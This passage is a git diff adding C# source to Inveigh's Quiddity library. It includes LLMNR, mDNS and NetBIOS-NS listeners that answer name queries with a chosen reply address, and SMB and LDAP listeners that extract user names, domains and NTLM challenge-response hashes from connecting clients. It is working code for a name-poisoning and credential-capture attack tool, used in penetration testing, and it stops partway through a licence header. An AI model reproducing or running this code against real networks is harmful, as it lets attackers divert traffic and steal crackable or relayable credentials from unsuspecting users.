+ LDAPBindRequest bind = new LDAPBindRequest(); + bind.ReadBytes((byte[][])message.ProtocolOp); + LDAPSaslCredentials sasl = new LDAPSaslCredentials(); + sasl.ReadBytes(bind.Authentication); + NTLMNegotiate ntlm = new NTLMNegotiate(); + ntlm.ReadBytes(sasl.Credentials, 0); + + if (ntlm.MessageType == 1) + { + NTLMChallenge challenge = new NTLMChallenge(Challenge, NetbiosDomain, ComputerName, DNSDomain, ComputerName, DNSDomain); + byte[] challengeData = challenge.GetBytes(ComputerName); + ntlmChallenge = BitConverter.ToString(challenge.ServerChallenge).Replace("-", ""); + + LDAPBindResponse bindResponse = new LDAPBindResponse + { + ServerSaslCreds = challengeData + }; + + LDAPMessage bindMessage = new LDAPMessage + { + MessageID = message.MessageID, + ProtocolOp = bindResponse + }; + + buffer = bindMessage.Encode(3); + OutputChallenge(listenerPort, clientIP, clientPort, ntlmChallenge); + } + else if (ntlm.MessageType == 3) + { + NTLMResponse ntlmResponse = new NTLMResponse(sasl.Credentials, false); + string domain = Encoding.Unicode.GetString(ntlmResponse.DomainName); + string user = Encoding.Unicode.GetString(ntlmResponse.UserName); + string host = Encoding.Unicode.GetString(ntlmResponse.Workstation); + string response2 = BitConverter.ToString(ntlmResponse.NtChallengeResponse).Replace("-", ""); + string lmResponse = BitConverter.ToString(ntlmResponse.LmChallengeResponse).Replace("-", ""); + OutputNTLM("LDAP", listenerPort, clientIP, clientPort, user, domain, host, ntlmChallenge, response2, lmResponse); + } + + } + + tcpStream.Write(buffer, 0, buffer.Length); + tcpStream.Flush(); + } + + } + catch (Exception ex) + { + OutputError(ex, port); + } + + } + + protected virtual void OutputConnection(string listenerPort, string clientIP, string clientPort, int tag) + { + + } + + protected virtual void OutputNTLM(string protocol, string listenerPort, string clientIP, string clientPort, string user, string domain, string host, string ntlmChallenge, string ntlmResponseHash, string lmResponseHash) + { + + } + + protected virtual void OutputChallenge(string listenerPort, string clientIP, string clientPort, string challenge) + { + + } + + protected virtual void OutputError(Exception ex, int port) + { + + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Listeners/LLMNRListener.cs b/Inveigh/Protocols/Quiddity/Quiddity/Listeners/LLMNRListener.cs new file mode 100644 index 0000000..a47808b --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Listeners/LLMNRListener.cs @@ -0,0 +1,101 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using Quiddity.LLMNR; +using System; +using System.Net; +using System.Net.Sockets; + +namespace Quiddity +{ + public class LLMNRListener : DNSListener + { + + public LLMNRListener() + { + this.TTL = 300; + } + + public new void Start(IPAddress ipAddress, string replyIP, string replyIPv6) + { + UDPListener listener = new UDPListener(AddressFamily.InterNetwork); + IPEndPoint ipEndPoint = new IPEndPoint(ipAddress, 5355); + + if (String.Equals(ipAddress.AddressFamily.ToString(), "InterNetwork")) + { + listener.JoinMulticastGroup(IPAddress.Parse("224.0.0.252")); + } + else + { + listener = new UDPListener(AddressFamily.InterNetworkV6); + listener.JoinMulticastGroup(IPAddress.Parse("ff02::1:3")); + } + + listener.Client.Bind(ipEndPoint); + + while (true) + { + + try + { + byte[] receiveBuffer = listener.Receive(ref ipEndPoint); + ProcessRequest(receiveBuffer, listener, ipEndPoint, replyIP, replyIPv6); + } + catch (Exception ex) + { + OutputError(ex); + } + + } + + } + + protected override void ProcessRequest(byte[] data, UDPListener udpListener, IPEndPoint ipEndPoint, string replyIP, string replyIPv6) + { + string clientIP = ipEndPoint.Address.ToString(); + LLMNRPacket packet = new LLMNRPacket(data); + + if (packet.Header.IsQuery()) + { + + if (Check(packet.Question.Name, packet.Question.Type, clientIP, out string message)) + { + byte[] buffer = packet.GetBytes(this.TTL, replyIP, replyIPv6); + SendTo(buffer, udpListener, ipEndPoint); + } + + Output("LLMNR", clientIP, packet.Question.Name, packet.Question.Type, message); + } + + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Listeners/MDNSListener.cs b/Inveigh/Protocols/Quiddity/Quiddity/Listeners/MDNSListener.cs new file mode 100644 index 0000000..dafe911 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Listeners/MDNSListener.cs @@ -0,0 +1,117 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using Quiddity.MDNS; +using System; +using System.Net; +using System.Net.Sockets; + +namespace Quiddity +{ + public class MDNSListener : DNSListener + { + public bool UnicastOnly { get; set; } + + public MDNSListener() + { + this.TTL = 120; + } + + public MDNSListener(uint ttl, bool unicastOnly) + { + this.TTL = ttl; + this.UnicastOnly = unicastOnly; + } + + public new void Start(IPAddress ipAddress, string replyIP, string replyIPv6) + { + UDPListener listener = new UDPListener(AddressFamily.InterNetwork); + IPEndPoint ipEndPoint = new IPEndPoint(ipAddress, 5353); + + if (string.Equals(ipAddress.AddressFamily.ToString(), "InterNetwork")) + { + listener.JoinMulticastGroup(IPAddress.Parse("224.0.0.251"), ipAddress); + } + else + { + listener = new UDPListener(AddressFamily.InterNetworkV6); + listener.JoinMulticastGroup(IPAddress.Parse("ff02::fb")); + } + + listener.Client.Bind(ipEndPoint); + + while (true) + { + + try + { + byte[] receiveBuffer = listener.Receive(ref ipEndPoint); + ProcessRequest(receiveBuffer, listener, ipEndPoint, replyIP, replyIPv6); + } + catch (Exception ex) + { + OutputError(ex); + } + + } + + } + + protected override void ProcessRequest(byte[] data, UDPListener udpListener, IPEndPoint ipEndPoint, string replyIP, string replyIPv6) + { + string clientIP = ipEndPoint.Address.ToString(); + MDNSPacket packet = new MDNSPacket(data); + + if (packet.Header.IsQuery()) + { + + if (Check(packet.Question.Name, packet.Question.QuestionType, packet.Question.Type, clientIP, out string message)) + { + + if (packet.Question.QuestionType.Equals("QM") && !this.UnicastOnly && string.Equals(ipEndPoint.Address.AddressFamily.ToString(), "InterNetwork")) + { + ipEndPoint.Address = IPAddress.Parse("224.0.0.251"); + } + else if (packet.Question.QuestionType.Equals("QM") && !this.UnicastOnly && string.Equals(ipEndPoint.Address.AddressFamily.ToString(), "InterNetworkV6")) + { + ipEndPoint.Address = IPAddress.Parse("ff02::fb"); + } + + byte[] buffer = packet.GetBytes(this.TTL, replyIP, replyIPv6); + SendTo(buffer, udpListener, ipEndPoint); + } + + Output("mDNS", clientIP, packet.Question.Name, packet.Question.QuestionType, packet.Question.Type, message); + } + + } + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Listeners/NetBIOSNSListener.cs b/Inveigh/Protocols/Quiddity/Quiddity/Listeners/NetBIOSNSListener.cs new file mode 100644 index 0000000..b3dada5 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Listeners/NetBIOSNSListener.cs @@ -0,0 +1,95 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using Quiddity.NetBIOS; +using System; +using System.Net; +using System.Net.Sockets; + +namespace Quiddity +{ + public class NetBIOSNSListener : DNSListener + { + public NetBIOSNSListener() + { + this.TTL = 165; + } + + public NetBIOSNSListener(uint ttl) + { + this.TTL = ttl; + } + + public void Start(IPAddress ipAddress, string replyIP) + { + UDPListener listener = new UDPListener(AddressFamily.InterNetwork); + IPEndPoint ipEndPoint = new IPEndPoint(ipAddress, 137); + + listener.Client.Bind(ipEndPoint); + + while (true) + { + + try + { + byte[] receiveBuffer = listener.Receive(ref ipEndPoint); + ProcessRequest(receiveBuffer, listener, ipEndPoint, replyIP); + } + catch (Exception ex) + { + OutputError(ex); + } + + } + + } + + protected void ProcessRequest(byte[] data, UDPListener udpListener, IPEndPoint ipEndPoint, string replyIP) + { + string clientIP = ipEndPoint.Address.ToString(); + NetBIOSNSPacket packet = new NetBIOSNSPacket(data); + + if (packet.Header.IsQuery()) + { + + if (Check(packet.Question.Name, packet.Question.Type, clientIP, out string message)) + { + byte[] buffer = packet.GetBytes(this.TTL, replyIP); + SendTo(buffer, udpListener, ipEndPoint); + } + + Output("NBNS", clientIP, packet.Question.Name, packet.Question.Type, message); + } + + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Listeners/SMBListener.cs b/Inveigh/Protocols/Quiddity/Quiddity/Listeners/SMBListener.cs new file mode 100644 index 0000000..b9c2197 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Listeners/SMBListener.cs @@ -0,0 +1,306 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Net; +using System.Net.Sockets; +using System.Text; +using System.Threading; +using Quiddity.NetBIOS; +using Quiddity.NTLM; +using Quiddity.SMB; +using Quiddity.SMB2; + +namespace Quiddity +{ + class SMBListener + { + public string Challenge { get; set; } + public string NetbiosDomain { get; set; } + public string ComputerName { get; set; } + public string DNSDomain { get; set; } + + public static bool isRunning = false; + public static ulong smb2Session = 5548434740922023936; + + internal void Start(IPAddress ipAddress, int port) + { + TCPListener tcpListener = new TCPListener(ipAddress, port); + IAsyncResult tcpAsync; + TcpClient tcpClient; + Guid guid = Guid.NewGuid(); + + try + { + tcpListener.Start(); + isRunning = true; + + if (tcpListener.Server.IsBound) + { + + while (isRunning) + { + + try + { + tcpAsync = tcpListener.BeginAcceptTcpClient(null, null); + + do + { + Thread.Sleep(10); + + if (!isRunning) + { + break; + } + + } + while (!tcpAsync.IsCompleted); + + tcpClient = tcpListener.EndAcceptTcpClient(tcpAsync); + object[] parameters = { guid, tcpClient, port }; + ThreadPool.QueueUserWorkItem(new WaitCallback(ReceiveClient), parameters); + } + catch (Exception ex) + { + OutputError(ex, port); + } + + } + + } + + } + catch (Exception ex) + { + OutputError(ex, port); + } + + } + + internal void ReceiveClient(object parameters) + { + object[] parameterArray = parameters as object[]; + Guid serverGuid = (Guid)parameterArray[0]; + TcpClient tcpClient = (TcpClient)parameterArray[1]; + int port = (int)parameterArray[2]; + NetworkStream tcpStream = tcpClient.GetStream(); + bool isSMB2; + string challenge = ""; + string clientIP = ((IPEndPoint)(tcpClient.Client.RemoteEndPoint)).Address.ToString(); + string clientPort = ((IPEndPoint)(tcpClient.Client.RemoteEndPoint)).Port.ToString(); + string listenerPort = ((IPEndPoint)(tcpClient.Client.LocalEndPoint)).Port.ToString(); + + try + { + + while (tcpClient.Connected && isRunning) + { + byte[] requestData = new byte[4096]; + + do + { + Thread.Sleep(100); + } + while (!tcpStream.DataAvailable && tcpClient.Connected); + + while (tcpStream.DataAvailable) + { + tcpStream.Read(requestData, 0, requestData.Length); + } + + NetBIOSSessionService requestNetBIOSSessionService = new NetBIOSSessionService(requestData); + SMBHelper smbHelper = new SMBHelper(); + + if (requestNetBIOSSessionService.Type == 0 || smbHelper.Protocol[0] == 0xfe || smbHelper.Protocol[0] == 0xff) + { + int sessionServiceIndex = 0; + + if (requestNetBIOSSessionService.Type == 0) + { + sessionServiceIndex = 4; + } + + byte[] sendBuffer = new byte[0]; + SMBHeader requestSMBHeader = new SMBHeader(); + SMB2Header requestSMB2Header = new SMB2Header(); + smbHelper.ReadBytes(requestData, sessionServiceIndex); + + if (smbHelper.Protocol[0] == 0xfe) + { + isSMB2 = true; + requestSMB2Header.ReadBytes(requestData, sessionServiceIndex); + } + else + { + isSMB2 = false; + requestSMBHeader.ReadBytes(requestData, sessionServiceIndex); + } + + if (!isSMB2 && requestSMBHeader.Command == 0x72 || (isSMB2 && requestSMB2Header.Command == 0)) + { + SMB2NegotiatelRequest smb2NegotiatelRequest = new SMB2NegotiatelRequest(requestData, 64 + sessionServiceIndex); + SMB2Header responseSMB2Header = new SMB2Header(); + SMB2NegotiateResponse smb2NegotiateResponse = new SMB2NegotiateResponse(); + + if (!isSMB2) + { + smb2NegotiateResponse.DialectRivision = new byte[2] { 0xff, 0x02 }; + smb2NegotiateResponse.Capabilities = new byte[4] { 0x07, 0x00, 0x00, 0x00 }; + OutputNegotiation("SMB1", listenerPort, clientIP, clientPort); + } + else if (isSMB2) + { + responseSMB2Header.MessageId = requestSMB2Header.MessageId; + + if (smb2NegotiatelRequest.GetMaxDialect() == 0x311) + { + smb2NegotiateResponse.DialectRivision = new byte[2] { 0x11, 0x03 }; + smb2NegotiateResponse.NegotiateContextCount = 3; + smb2NegotiateResponse.Capabilities = new byte[4] { 0x2f, 0x00, 0x00, 0x00 }; + smb2NegotiateResponse.NegotiateContextOffset = 448; + smb2NegotiateResponse.NegotiateContextList = new SMB2NegotiateContext().GetBytes(new string[] { "1", "2", "3" }); + OutputNegotiation("SMB3", listenerPort, clientIP, clientPort); + } + else + { + smb2NegotiateResponse.DialectRivision = new byte[2] { 0x10, 0x02 }; + smb2NegotiateResponse.Capabilities = new byte[4] { 0x07, 0x00, 0x00, 0x00 }; + OutputNegotiation("SMB2", listenerPort, clientIP, clientPort); + } + + responseSMB2Header.Reserved2 = requestSMB2Header.Reserved2; // todo fix + } + + smb2NegotiateResponse.EncodeBuffer(); + smb2NegotiateResponse.ServerGUID = serverGuid.ToByteArray(); + sendBuffer = SMB2Helper.GetBytes(new NetBIOSSessionService(), responseSMB2Header, smb2NegotiateResponse); + } + else if (isSMB2 && requestSMB2Header.Command > 0) + { + + switch (requestSMB2Header.Command) + { + + case 1: + { + SMB2SessionSetupRequest smb2SessionSetupRequest = new SMB2SessionSetupRequest(requestData, 64 + sessionServiceIndex); + NTLMNegotiate requestNTLMNegotiate = new NTLMNegotiate(smb2SessionSetupRequest.Buffer, true); + + if (requestNTLMNegotiate.MessageType == 1) + { + SMB2Header responseSMB2Header = new SMB2Header(); + SMB2SessionSetupResponse smb2SessionSetupResponse = new SMB2SessionSetupResponse(); + responseSMB2Header.Status = new byte[4] { 0x16, 0x00, 0x00, 0xc0 }; + responseSMB2Header.CreditCharge = 1; + responseSMB2Header.Reserved2 = requestSMB2Header.Reserved2; + responseSMB2Header.Command = 1; + responseSMB2Header.Flags = new byte[4] { 0x11, 0x00, 0x00, 0x00 }; + responseSMB2Header.MessageId = requestSMB2Header.MessageId; + responseSMB2Header.SessionId = BitConverter.GetBytes(smb2Session); + smb2Session++; + smb2SessionSetupResponse.Pack(Challenge, NetbiosDomain, ComputerName, DNSDomain, ComputerName, DNSDomain, out byte[] challengeData); + sendBuffer = SMB2Helper.GetBytes(new NetBIOSSessionService(), responseSMB2Header, smb2SessionSetupResponse); + challenge = BitConverter.ToString(challengeData).Replace("-", ""); + OutputChallenge(listenerPort, clientIP, clientPort, challenge); + } + else if (requestNTLMNegotiate.MessageType == 3) + { + NTLMResponse ntlmResponse = new NTLMResponse(smb2SessionSetupRequest.Buffer, true); + string domain = Encoding.Unicode.GetString(ntlmResponse.DomainName); + string user = Encoding.Unicode.GetString(ntlmResponse.UserName); + string host = Encoding.Unicode.GetString(ntlmResponse.Workstation); + string response = BitConverter.ToString(ntlmResponse.NtChallengeResponse).Replace("-", ""); + string lmResponse = BitConverter.ToString(ntlmResponse.LmChallengeResponse).Replace("-", ""); + OutputNTLM("SMB", listenerPort, clientIP, clientPort, user, domain, host, challenge, response, lmResponse); + SMB2Header responseSMB2Header = new SMB2Header(); + SMB2SessionSetupResponse smb2SessionSetupResponse = new SMB2SessionSetupResponse(); + responseSMB2Header.Status = new byte[4] { 0x6d, 0x00, 0x00, 0xc0 }; + //responseSMB2Header.Status = new byte[4] { 0x00, 0x00, 0x00, 0x00 }; + //responseSMB2Header.Status = new byte[4] { 0x22, 0x00, 0x00, 0xc0 }; //access denied + responseSMB2Header.CreditCharge = 1; + responseSMB2Header.Reserved2 = requestSMB2Header.Reserved2; + responseSMB2Header.Command = 1; + responseSMB2Header.Flags = new byte[4] { 0x11, 0x00, 0x00, 0x00 }; + responseSMB2Header.MessageId = requestSMB2Header.MessageId; + responseSMB2Header.SessionId = requestSMB2Header.SessionId; + smb2SessionSetupResponse.SecurityBufferOffset = 0; + sendBuffer = SMB2Helper.GetBytes(new NetBIOSSessionService(), responseSMB2Header, smb2SessionSetupResponse); + } + + } + break; + + } + + } + + tcpStream.Write(sendBuffer, 0, sendBuffer.Length); + tcpStream.Flush(); + } + else + { + tcpClient.Close(); + } + + } + + } + catch (Exception ex) + { + OutputError(ex, port); + } + + } + + protected virtual void OutputNTLM(string protocol, string listenerPort, string clientIP, string clientPort, string user, string domain, string host, string ntlmChallenge, string ntlmResponseHash, string lmResponseHash) + { + + } + + protected virtual void OutputChallenge(string listenerPort, string clientIP, string clientPort, string challenge) + { + + } + + protected virtual void OutputNegotiation(string protocol, string listenerPort, string clientIP, string clientPort) + { + + } + + protected virtual void OutputError(Exception ex, int port) + { + + } + + } + +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Listeners/TCPListener.cs b/Inveigh/Protocols/Quiddity/Quiddity/Listeners/TCPListener.cs new file mode 100644 index 0000000..102f773 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Listeners/TCPListener.cs @@ -0,0 +1,48 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System.Net; +using System.Net.Sockets; + +namespace Quiddity +{ + public class TCPListener : TcpListener + { + public TCPListener(IPAddress ipAddress, int port) : base(ipAddress, port) + { + this.Server.ExclusiveAddressUse = false; + this.ExclusiveAddressUse = false; + this.Server.SetSocketOption(SocketOptionLevel.Socket, SocketOptionName.ReuseAddress, true); + } + + } + +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Listeners/UDPListener.cs b/Inveigh/Protocols/Quiddity/Quiddity/Listeners/UDPListener.cs new file mode 100644 index 0000000..70cd01f --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Listeners/UDPListener.cs @@ -0,0 +1,58 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System.Net; +using System.Net.Sockets; + +namespace Quiddity +{ + public class UDPListener : UdpClient + { + + public UDPListener(AddressFamily addressFamily) : base(addressFamily) + { + this.ExclusiveAddressUse = false; + this.Client.SetSocketOption(SocketOptionLevel.Socket, SocketOptionName.ReuseAddress, true); + const int SIO_UDP_CONNRESET = -1744830452; + +#if NETFRAMEWORK + this.Client.IOControl((IOControlCode)SIO_UDP_CONNRESET, new byte[] { 0, 0, 0, 0 }, null); +#else + if (System.OperatingSystem.IsWindows()) + { + this.Client.IOControl((IOControlCode)SIO_UDP_CONNRESET, new byte[] { 0, 0, 0, 0 }, null); + } +#endif + + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DCERPC/SCMR/SCMRROpenSCManagerW.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DCERPC/SCMR/SCMRROpenSCManagerW.cs new file mode 100644 index 0000000..2337915 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DCERPC/SCMR/SCMRROpenSCManagerW.cs @@ -0,0 +1,15 @@ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Text; + +namespace Quiddity.SCMR +{ + public class SCMRROpenSCManagerW + { + // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-scmr/dc84adb3-d51d-48eb-820d-ba1c6ca5faf2 + public byte[] LpMachineName { get; set; } + public byte[] LpDatabaseName { get; set; } + public byte[] DwDesiredAccess { get; set; } + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/DHCPv6Checker.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/DHCPv6Checker.cs new file mode 100644 index 0000000..faec0fd --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/DHCPv6/DHCPv6Checker.cs @@ -0,0 +1,150 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED 